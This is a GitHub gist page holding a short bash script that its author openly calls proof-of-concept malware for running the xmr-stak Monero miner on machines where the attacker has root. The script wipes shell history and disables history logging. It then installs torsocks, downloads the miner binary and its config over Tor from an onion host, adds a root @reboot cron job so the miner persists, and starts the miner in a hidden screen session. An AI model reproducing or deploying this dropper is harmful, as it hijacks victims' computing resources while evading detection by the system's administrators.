Skip to content

Instantly share code, notes, and snippets.

@Elycin
Last active December 12, 2017 10:48
Show Gist options
  • Save Elycin/7514af0e7aae66dd8b84e1ea47b17d7d to your computer and use it in GitHub Desktop.
Save Elycin/7514af0e7aae66dd8b84e1ea47b17d7d to your computer and use it in GitHub Desktop.
Proof of concept malware that can be used with xmr-stak to create someone profit on root machines.
#!/bin/bash
ONION="http://myonion.onion";
EXEC_PATH="/etc/stak"
RUN="cd $EXEC_PATH && screen -S xmr-stak -d -m $EXEC_PATH/xmr-stak";
EXEC="@reboot $RUN";
unset HISTFILE;
echo "unset HISTFILE" >> ~/.bashrc;
history -c;
history -w;
if [ ! -f "/usr/bin/torsocks" ]
then
if [ -e "/usr/bin/apt-get" ]
then
apt-get update -y > /dev/null;
apt-get install torsocks -y > /dev/null;
fi
if [ -e "/usr/bin/yum" ]
then
yum update -y > /dev/null;
yum install torsocks -y > /dev/null;
fi
fi
function download () {
torsocks wget $ONION/$1 -O $EXEC_PATH/$1 > /dev/null;
}
mkdir -p $EXEC_PATH;
download xmr-stak
download config.txt
(crontab -u root -l; echo "$EXEC" ) | crontab -u root -;
$RUN;
exit 0;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment